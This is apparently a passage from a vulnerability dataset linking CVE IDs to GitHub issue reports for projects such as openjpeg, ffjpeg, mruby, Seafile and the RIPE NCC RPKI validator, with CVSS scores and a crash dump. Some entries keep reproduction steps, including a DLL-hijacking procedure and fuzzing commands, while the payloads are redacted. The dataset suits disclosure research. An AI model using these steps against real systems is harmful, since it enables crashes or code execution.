NUMBERTAG ffc APITAG cd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ca9ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cd6a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d2f NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4ce NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d NUMBERTAG ba NUMBERTAG PATHTAG APITAG NUMBERTAG a2 APITAG eed0a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG edcd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eecc NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed4b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed2be NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec4ca NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed2d NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eb NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eba2b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eed NUMBERTAG PATHTAG APITAG Break instruction exception code NUMBERTAG first chance) APITAG NUMBERTAG ffc ef NUMBERTAG c cc int NUMBERTAG g APITAG NUMBERTAG ffc APITAG eed7e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG e NUMBERTAG af NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ca7f NUMBERTAG PATHTAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 
WARNING: Unable to verify checksum for PATHTAG APITAG NUMBERTAG ffc APITAG f3b2d NUMBERTAG c NUMBERTAG k Child SP APITAG Call Site NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG ee APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG d APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG d APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG d0bf5 APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG a NUMBERTAG de APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG ab NUMBERTAG APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG bdfc8 APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG f APITAG e NUMBERTAG a NUMBERTAG APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG f APITAG c NUMBERTAG c6c NUMBERTAG APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG c NUMBERTAG a3 APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG a NUMBERTAG f APITAG cae5aac3 APITAG PATHTAG NUMBERTAG b NUMBERTAG f APITAG caef NUMBERTAG ae APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for magick.exe NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG ea APITAG PATHTAG NUMBERTAG d NUMBERTAG f APITAG NUMBERTAG APITAG PATHTAG NUMBERTAG e NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG magick!wmain NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f APITAG NUMBERTAG e NUMBERTAG magick!invoke_main NUMBERTAG PATHTAG NUMBERTAG f APITAG NUMBERTAG cfe APITAG PATHTAG NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG magick!__scrt_common_main NUMBERTAG e PATHTAG NUMBERTAG f APITAG ee NUMBERTAG bd4 APITAG PATHTAG NUMBERTAG f APITAG ef5ace NUMBERTAG APITAG NUMBERTAG f APITAG NUMBERTAG APITAG NUMBERTAG u APITAG PATHTAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG a e NUMBERTAG b NUMBERTAG jmp APITAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG mov edx,dword ptr [rsp NUMBERTAG h NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG b e NUMBERTAG ddfbff call APITAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG f NUMBERTAG f5ac0 cvtsd2ss xmm0,xmm 
NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG c f NUMBERTAG f NUMBERTAG ef NUMBERTAG movss dword ptr [ra NUMBERTAG EF NUMBERTAG h],xmm0 System Configuration APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG License: FILETAG Environment APITAG system, version and so on): Distributor ID: Microsoft Windows Description: Windows NUMBERTAG",
  48603. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48604. "severity": "MEDIUM",
  48605. "baseScore": 6.5,
  48606. "impactScore": 3.6,
  48607. "exploitabilityScore": 2.8
  48608. },
  48609. {
  48610. "CVE_ID": "CVE-2020-15389",
  48611. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1261",
  48612. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1261",
  48613. "Repo_new": "uclouvain/openjpeg",
  48614. "Issue_Created_At": "2020-06-28T10:06:42Z",
  48615. "description": "Heap use after free. There is a heap use after free vulnerability in PATHTAG I would also like to request a CVE if that's okay or I can do it myself if you're busy, no worries. Here is the ASAN output: FILETAG Here is the command executed to reproduce the issue: ./opj_decompress APITAG Inputs/ APITAG PGM If you would also like the files I have in the Inputs/, let me know and I can find a way to provide them.",
  48616. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
  48617. "severity": "MEDIUM",
  48618. "baseScore": 6.5,
  48619. "impactScore": 4.2,
  48620. "exploitabilityScore": 2.2
  48621. },
  48622. {
  48623. "CVE_ID": "CVE-2020-15470",
  48624. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/26",
  48625. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/26",
  48626. "Repo_new": "rockcarry/ffjpeg",
  48627. "Issue_Created_At": "2020-06-30T05:18:26Z",
  48628. "description": "ffjpeg APITAG function heap overflow vulnerability. ffjpeg APITAG function heap overflow vulnerability Description: There is a heap overflow bug in jfif_decode(void ctxt, BMP pb) function at PATHTAG : line NUMBERTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. The bug is caused by the following dangerous memcpy calling in APITAG function: for (i NUMBERTAG i APITAG NUMBERTAG bebebebebebebebe RB NUMBERTAG fffffffdd NUMBERTAG e NUMBERTAG RC NUMBERTAG fffffffdbc NUMBERTAG ad NUMBERTAG c NUMBERTAG af NUMBERTAG c RD NUMBERTAG RSI NUMBERTAG fffffffdbc NUMBERTAG ad NUMBERTAG c NUMBERTAG af NUMBERTAG c RDI NUMBERTAG ffff NUMBERTAG ff NUMBERTAG bebebebebebebebe RBP NUMBERTAG fffffffe3d NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : movsxd rcx,DWORD PTR [rb NUMBERTAG RIP NUMBERTAG ffffffffcd4a5e NUMBERTAG R NUMBERTAG c2a NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b NUMBERTAG f3f3f3f3f3f3f3f3 R NUMBERTAG fff7b NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b4c NUMBERTAG f1f1f1f NUMBERTAG R NUMBERTAG ffff NUMBERTAG ffee EFLAGS NUMBERTAG CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4a5e NUMBERTAG stack NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : movsxd rcx,DWORD PTR [rb NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffda NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_height NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : push rbp NUMBERTAG fffffffda NUMBERTAG a NUMBERTAG fffffffda NUMBERTAG c NUMBERTAG c7b NUMBERTAG d NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG e NUMBERTAG fffffffda NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4a5e NUMBERTAG in ?? 
() We ensured there is a heap overflow because of the dangerous using of memcpy function, attacker can use this bug to finish a APITAG attack. You can reproduce this heap overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG",
  48629. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48630. "severity": "MEDIUM",
  48631. "baseScore": 5.5,
  48632. "impactScore": 3.6,
  48633. "exploitabilityScore": 1.8
  48634. },
  48635. {
  48636. "CVE_ID": "CVE-2020-15500",
  48637. "Issue_Url_old": "https://github.com/maptiler/tileserver-gl/issues/461",
  48638. "Issue_Url_new": "https://github.com/maptiler/tileserver-gl/issues/461",
  48639. "Repo_new": "maptiler/tileserver-gl",
  48640. "Issue_Created_At": "2020-07-01T17:12:34Z",
  48641. "description": "Reflected XSS vulnerability in the application main page. Hi, I stumbled upon a reflected XSS in the software. It stems from reflecting unsanitized user controlled input directly into the HTTP response. I initially observed this in Tileserver GL NUMBERTAG but from the looks of it it's still present in the current master . Vulnerable request example: APITAG",
  48642. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48643. "severity": "MEDIUM",
  48644. "baseScore": 6.1,
  48645. "impactScore": 2.7,
  48646. "exploitabilityScore": 2.8
  48647. },
  48648. {
  48649. "CVE_ID": "CVE-2020-15502",
  48650. "Issue_Url_old": "https://github.com/duckduckgo/Android/issues/527",
  48651. "Issue_Url_new": "https://github.com/duckduckgo/android/issues/527",
  48652. "Repo_new": "duckduckgo/android",
  48653. "Issue_Created_At": "2019-07-09T13:02:51Z",
  48654. "description": "Domains visited get leaked to DDG servers. URLTAG This seems to be leaking all(?) the domains that users visit to your servers.",
  48655. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  48656. "severity": "HIGH",
  48657. "baseScore": 7.5,
  48658. "impactScore": 3.6,
  48659. "exploitabilityScore": 3.9
  48660. },
  48661. {
  48662. "CVE_ID": "CVE-2020-15600",
  48663. "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/15",
  48664. "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/15",
  48665. "Repo_new": "boiteasite/cmsuno",
  48666. "Issue_Created_At": "2020-05-30T21:38:48Z",
  48667. "description": "CSRF Vulnerability. Hi ~ I find a CSRF Vulnerability ! Version NUMBERTAG Author : Noth(\u6c88\u5f67\u74bf) Step NUMBERTAG go to FILETAG Step NUMBERTAG Use burpsuite to intercept packets Step NUMBERTAG Generate APITAG FILETAG Test Video : URLTAG No CSRF Token so that can login to the system .",
  48668. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  48669. "severity": "MEDIUM",
  48670. "baseScore": 6.5,
  48671. "impactScore": 3.6,
  48672. "exploitabilityScore": 2.8
  48673. },
  48674. {
  48675. "CVE_ID": "CVE-2020-15688",
  48676. "Issue_Url_old": "https://github.com/embedthis/goahead-gpl/issues/3",
  48677. "Issue_Url_new": "https://github.com/embedthis/goahead-gpl/issues/3",
  48678. "Repo_new": "embedthis/goahead-gpl",
  48679. "Issue_Created_At": "2020-07-15T22:40:59Z",
  48680. "description": "Digest Nonce Handling over HTTP. Overview A security vulnerability affecting APITAG versions NUMBERTAG to NUMBERTAG has been identified when using Digest authentication over HTTP. Summary A Digest authentication vulnerability has been identified due to handling of the digest \"nonce\" value. This may permit request replay for local requests over HTTP. Detail Digest authentication uses a \"nonce\" value to mitigate replay attacks. APITAG version NUMBERTAG did not validate this nonce value. APITAG versions NUMBERTAG to NUMBERTAG alidated the nonce with a fixed duration of NUMBERTAG minutes which permitted short period replays. Threat Scope An attacker with local access to traffic on HTTP networks could capture a request and replay that request. For APITAG NUMBERTAG to NUMBERTAG this replay must happen inside the NUMBERTAG minutes. Severity An attacker with access to traffic on HTTP networks could capture a request and replay that request. This could lead to unauthorized access to the service. Remedy Deploy APITAG NUMBERTAG or NUMBERTAG or later and configure ME_GOAHEAD_NONCE_DURATION to be suitably short for your needs. Advice The ME_GOAHEAD_NONCE_DURATION should be only long enough for your user to login. Further, if you must use Digest authentication you should use this only over HTTPS to eliminate the possibility of an attacker capturing and replaying the request during the ME_GOAHEAD_NONCE_DURATION period. Embedthis strongly discourages the use of Digest (and Basic) authentication. They are inherently insecure as you cannot reliably implement logout. Use form / HTTP based authentication over HTTPS with suitable ciphers such as bcrypt. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . CVE CVETAG NVD: CVETAG",
  48681. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  48682. "severity": "HIGH",
  48683. "baseScore": 8.8,
  48684. "impactScore": 5.9,
  48685. "exploitabilityScore": 2.8
  48686. },
  48687. {
  48688. "CVE_ID": "CVE-2020-15689",
  48689. "Issue_Url_old": "https://github.com/embedthis/appweb-gpl/issues/2",
  48690. "Issue_Url_new": "https://github.com/embedthis/appweb-gpl/issues/2",
  48691. "Repo_new": "embedthis/appweb-gpl",
  48692. "Issue_Created_At": "2020-05-25T23:01:39Z",
  48693. "description": "Appweb Security Alerts. Appweb Security Alerts Notification Alert Log for Appweb security issues. Subscribe to be notified when alerts are posted to log.",
  48694. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48695. "severity": "HIGH",
  48696. "baseScore": 7.5,
  48697. "impactScore": 3.6,
  48698. "exploitabilityScore": 3.9
  48699. },
  48700. {
  48701. "CVE_ID": "CVE-2020-15807",
  48702. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/186",
  48703. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/186",
  48704. "Repo_new": "libredwg/libredwg",
  48705. "Issue_Created_At": "2020-01-14T12:30:37Z",
  48706. "description": "NULL pointer dereference. Hello, I got a NULL pointer dereference bug by running APITAG ERRORTAG",
  48707. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48708. "severity": "MEDIUM",
  48709. "baseScore": 6.5,
  48710. "impactScore": 3.6,
  48711. "exploitabilityScore": 2.8
  48712. },
  48713. {
  48714. "CVE_ID": "CVE-2020-15807",
  48715. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/189",
  48716. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/189",
  48717. "Repo_new": "libredwg/libredwg",
  48718. "Issue_Created_At": "2020-01-16T11:36:57Z",
  48719. "description": "Some NULL pointer bugs. Hi, I got some bugs which you can reproduce APITAG APITAG bugs work on version APITAG and earlier .",
  48720. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48721. "severity": "MEDIUM",
  48722. "baseScore": 6.5,
  48723. "impactScore": 3.6,
  48724. "exploitabilityScore": 2.8
  48725. },
  48726. {
  48727. "CVE_ID": "CVE-2020-15807",
  48728. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/190",
  48729. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/190",
  48730. "Repo_new": "libredwg/libredwg",
  48731. "Issue_Created_At": "2020-01-16T11:51:56Z",
  48732. "description": "Some heap_overflow bug. Hi, I got some bugs which you can reproduce APITAG APITAG bugs work on version APITAG and earlier .",
  48733. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48734. "severity": "MEDIUM",
  48735. "baseScore": 6.5,
  48736. "impactScore": 3.6,
  48737. "exploitabilityScore": 2.8
  48738. },
  48739. {
  48740. "CVE_ID": "CVE-2020-15813",
  48741. "Issue_Url_old": "https://github.com/Graylog2/graylog2-server/issues/5906",
  48742. "Issue_Url_new": "https://github.com/graylog2/graylog2-server/issues/5906",
  48743. "Repo_new": "graylog2/graylog2-server",
  48744. "Issue_Created_At": "2019-04-24T14:39:48Z",
  48745. "description": "LDAP connector does not verify TLS certificates. Expected Behavior Graylog should verify the LDAP server certificate chain up to a trusted root, and refuse the connection when the certificate chain cannot be verified. Current Behavior Graylog accepts LDAP server certificates whose root certificate is not in any trust store. This presents a vulnerability for man in the middle attacks. Possible Solution Steps to Reproduce (for bugs NUMBERTAG Navigate to the LDAP / Active Directory configuration page NUMBERTAG Enable LDAP, choose server type 'LDAP' and enter the address of a STARTTLS enabled LDAP server, whose TLS certificate should not be verifiable by the server. Uncheck 'SSL' and APITAG self signed certificates'. Check APITAG NUMBERTAG Provide a bind DN and password in the APITAG Username' and APITAG Password' fields NUMBERTAG Click the APITAG Server Connection' button. Context We run Graylog in a Docker container, using the official Docker image URLTAG . Our LDAP server is on a different network. We would be better protected against man in the middle attacks if Graylog verifies the LDAP server certificate. Your Environment Graylog Version NUMBERTAG Elasticsearch Version NUMBERTAG APITAG Version NUMBERTAG Operating System: Debian NUMBERTAG inside Graylog Docker container Browser version: Firefo NUMBERTAG esr",
  48746. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48747. "severity": "HIGH",
  48748. "baseScore": 8.1,
  48749. "impactScore": 5.9,
  48750. "exploitabilityScore": 2.2
  48751. },
  48752. {
  48753. "CVE_ID": "CVE-2020-15861",
  48754. "Issue_Url_old": "https://github.com/net-snmp/net-snmp/issues/145",
  48755. "Issue_Url_new": "https://github.com/net-snmp/net-snmp/issues/145",
  48756. "Repo_new": "net-snmp/net-snmp",
  48757. "Issue_Created_At": "2020-07-09T09:32:21Z",
  48758. "description": "APITAG NUMBERTAG Security issues in net snmp. Dear all, In the course of a penetration test performed by our security analysts, we have noticed some security vulnerabilities in net snmp. Your deprecated bug tracker ( CVETAG redirects to Github. Sadly, Github does not support creating private issues for security relevant bugs. We would like to send you the findings in an encrypted manner to enable you to mitigate them. For encrypted communication, we can offer a web based platform hosted by us, or we can offer to encrypt our e mails via S/MIME or PGP. Please let us know which method fits you best. In order to transmit our findings via email, we will need either a public S/MIME certificate or your public PGP key of an active and trustworthy contributor of this project. As stated in our Responsible Disclosure Guideline (see URLTAG we will treat the vulnerabilities as confidential. We will grant you a time frame of NUMBERTAG days to release a patch. After that deadline, we will reserve the right to publish the vulnerabilities. Sincerely, usd responsible disclosure team APITAG About usd AG usd AG protects companies from hackers and criminals. As an accredited auditor, we consult and certify companies worldwide. Our work is as dynamic and diverse as current threats. We review IT systems, applications and processes for security vulnerabilities and help with their mitigation. With our Security Trainings, we raise security awareness; the CST Academy promotes an active dialogue and a transfer of knowledge. APITAG more security. usd APITAG Registered office NUMBERTAG Neu Isenburg Local court of Offenbach: HRB NUMBERTAG Executive Board: Andreas Duchmann, Manfred Tubach (CEO) Chairman supervisory board: Dr. Dietmar Kirchner VAT ID: DE NUMBERTAG APITAG",
  48759. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  48760. "severity": "HIGH",
  48761. "baseScore": 7.8,
  48762. "impactScore": 5.9,
  48763. "exploitabilityScore": 1.8
  48764. },
  48765. {
  48766. "CVE_ID": "CVE-2020-15866",
  48767. "Issue_Url_old": "https://github.com/mruby/mruby/issues/5042",
  48768. "Issue_Url_new": "https://github.com/mruby/mruby/issues/5042",
  48769. "Repo_new": "mruby/mruby",
  48770. "Issue_Created_At": "2020-07-20T21:23:46Z",
  48771. "description": "Heap buffer overflow in mruby interpreter. A heap buffer overflow exists in APITAG function in APITAG triggered via APITAG . The bug can be reproduced on Ubuntu NUMBERTAG bit with ASAN enabled mruby. It has been reproduced with mruby compiled with different compiler toolchains: APITAG . The POC input and steps to reproduce are provided below. POC Input CODETAG Steps to reproduce CODETAG ASAN Report ERRORTAG Authors Prashast Srivastava APITAG University) , Mathias Payer (EPFL)",
  48772. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48773. "severity": "CRITICAL",
  48774. "baseScore": 9.8,
  48775. "impactScore": 5.9,
  48776. "exploitabilityScore": 3.9
  48777. },
  48778. {
  48779. "CVE_ID": "CVE-2020-15890",
  48780. "Issue_Url_old": "https://github.com/LuaJIT/LuaJIT/issues/601",
  48781. "Issue_Url_new": "https://github.com/luajit/luajit/issues/601",
  48782. "Repo_new": "luajit/luajit",
  48783. "Issue_Created_At": "2020-07-10T23:37:23Z",
  48784. "description": "Segmentation fault in lj_err_run. Hi, we found a crash in APITAG Version NUMBERTAG Git hash: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
  48785. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48786. "severity": "HIGH",
  48787. "baseScore": 7.5,
  48788. "impactScore": 3.6,
  48789. "exploitabilityScore": 3.9
  48790. },
  48791. {
  48792. "CVE_ID": "CVE-2020-15930",
  48793. "Issue_Url_old": "https://github.com/laurent22/joplin/issues/3552",
  48794. "Issue_Url_new": "https://github.com/laurent22/joplin/issues/3552",
  48795. "Repo_new": "laurent22/joplin",
  48796. "Issue_Created_At": "2020-07-23T21:23:41Z",
  48797. "description": "Security Vulnerability. I'm opening this issue for future disclosure regarding the vulnerability reported via e mail.",
  48798. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48799. "severity": "MEDIUM",
  48800. "baseScore": 6.1,
  48801. "impactScore": 2.7,
  48802. "exploitabilityScore": 2.8
  48803. },
  48804. {
  48805. "CVE_ID": "CVE-2020-16143",
  48806. "Issue_Url_old": "https://github.com/haiwen/seafile-client/issues/1309",
  48807. "Issue_Url_new": "https://github.com/haiwen/seafile-client/issues/1309",
  48808. "Repo_new": "haiwen/seafile-client",
  48809. "Issue_Created_At": "2020-07-22T09:30:42Z",
  48810. "description": "DLL Hijacking APITAG DLL: exchndl.dll Affected Process: FILETAG Tested on: Windows NUMBERTAG Pro NUMBERTAG ersion NUMBERTAG Description: Seafile Client ver NUMBERTAG is vulnerable to DLL hijacking because it loads APITAG from the directories listed in the %PATH% environment variable. Steps to reproduce NUMBERTAG Compile the following APITAG code and name the output dll file as APITAG NUMBERTAG Drop the APITAG in a writable directory in the %PATH% environment variable. APITAG in this case NUMBERTAG Execute Seafile by double clicking the Seafile icon on desktop or running FILETAG APITAG Files NUMBERTAG PATHTAG ) in cmd NUMBERTAG The APITAG will be executed. APITAG Code: CODETAG Screenshots: FILETAG FILETAG",
  48811. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  48812. "severity": "HIGH",
  48813. "baseScore": 7.8,
  48814. "impactScore": 5.9,
  48815. "exploitabilityScore": 1.8
  48816. },
  48817. {
  48818. "CVE_ID": "CVE-2020-16162",
  48819. "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232",
  48820. "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/232",
  48821. "Repo_new": "ripe-ncc/rpki-validator-3",
  48822. "Issue_Created_At": "2020-07-07T10:34:28Z",
  48823. "description": "RIPE NCC Validator by default is insecure. According to documentation the default operating mode of the RIPE NCC Validator is APITAG , this means that by default the validator operates in an insecure mode which is detrimental to the users of the software. It is beyond me why I have to open so many tickets to encourage the developers of this software to produce something that is not an immediate and urgent risk to anyone using this software.",
  48824. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  48825. "severity": "HIGH",
  48826. "baseScore": 7.5,
  48827. "impactScore": 3.6,
  48828. "exploitabilityScore": 3.9
  48829. },
  48830. {
  48831. "CVE_ID": "CVE-2020-16162",
  48832. "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162",
  48833. "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/162",
  48834. "Repo_new": "ripe-ncc/rpki-validator-3",
  48835. "Issue_Created_At": "2020-03-30T14:33:10Z",
  48836. "description": "An expired or missing CRL doesn't result in the manifest being considered invalid. This issue was also informally reported to RIPE NCC staff in late February NUMBERTAG It appears that the RIPE NCC validator doesn't consider an expired CRL a cause to consider the associated manifest and underlying objects invalid. It logs a warning, but does not consider this situation erroneous. Theoretically a replay attack can be executed by making the CRL unavailable in a man-in-the-middle scenario. The RPKI data download procedure in\u00a0RIPE NCC's Validator must assume it is collecting untrusted data, which must be verified using the certificate verification model where an expired CRL means that none of the NUMBERTAG objects pointing to the CRL can be validated or considered valid. Some more (hard to read) context is available in the RPKI standards forum at IETF via URLTAG and specifically URLTAG If the CRL is expired, the manifest & directory should not be considered eligible for further processing and the associated VRPs should not be emitted to the RTR process. Manifests and CRLs complement each other; manifests are not a replacement for CRLs. The manifest specification assumes a sensible policy regarding CRL expiration is applied. Since RPKI does not have any certificate revocation mechanism other than CRLs (there is no OCSP or other tricks in the specs) I believe that ignoring the CRL's expiration date opens up RIPE NCC's validator for replay attacks which can have adverse operational consequences (aka an attacker has the ability to flip BGP routes from valid to invalid). For transparency reasons: I'm filing this bug so I can reference it later on in a write up about how these validation issues were handled.",
  48837. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  48838. "severity": "HIGH",
  48839. "baseScore": 7.5,
  48840. "impactScore": 3.6,
  48841. "exploitabilityScore": 3.9
  48842. },
  48843. {
  48844. "CVE_ID": "CVE-2020-16163",
  48845. "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/159",
  48846. "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/159",
  48847. "Repo_new": "ripe-ncc/rpki-validator-3",
  48848. "Issue_Created_At": "2020-03-24T13:45:25Z",
  48849. "description": "RRDP fetches should not proceed if the TLS HTTPS endpoint doesn't validate. RFC NUMBERTAG section NUMBERTAG HTTPS Considerations\" states: > Because of this, Relying Parties SHOULD do TLS certificate and host name validation when they fetch from an RRDP Repository Server. The SHOULD probably should be read as a MUST , given the validator's susceptibility to fetch from a compromised (MITM'ed) RRDP service especially when combined with a partial withholding attack. Note: checking the TLS certs of the RRDP channel makes MITM's harder but not impossible! More work is needed in the validation procedure regardless of fixing this TLS RRDP issue. Recommendation: APITAG should be changed to APITAG in the default distribution & settings. It is hard to imagine a scenario where one would want to disable TLS certificate validation.",
  48850. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  48851. "severity": "CRITICAL",
  48852. "baseScore": 9.1,
  48853. "impactScore": 5.2,
  48854. "exploitabilityScore": 3.9
  48855. },
  48856. {
  48857. "CVE_ID": "CVE-2020-16164",
  48858. "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/158",
  48859. "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/158",
  48860. "Repo_new": "ripe-ncc/rpki-validator-3",
  48861. "Issue_Created_At": "2020-03-23T17:35:24Z",
  48862. "description": "Missing files don't result in a manifest being considered invalid. In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain .roa files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsable, CRL exists and is valid (also not expired), and manifest is signed with keys not revoked by the CRL), and references files which do not exist in the repository at hand, the publication point should be considered compromised. So in the case of APNIC where an End User (self hosted) RPKI publication point misses a few .roa files, the validator can proceed to consider all data from all RPs it could reach valid, except the data from the publication point where files were missing. In other words: if one or a few files are missing from the repository, the repository should be considered 'down', and no attempt should be made to start guessing what can be salvaged and what not.",
  48863. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  48864. "severity": "HIGH",
  48865. "baseScore": 7.4,
  48866. "impactScore": 5.2,
  48867. "exploitabilityScore": 2.2
  48868. },
  48869. {
  48870. "CVE_ID": "CVE-2020-16165",
  48871. "Issue_Url_old": "https://github.com/chillzhuang/SpringBlade/issues/9",
  48872. "Issue_Url_new": "https://github.com/chillzhuang/springblade/issues/9",
  48873. "Repo_new": "chillzhuang/springblade",
  48874. "Issue_Created_At": "2020-07-25T13:56:47Z",
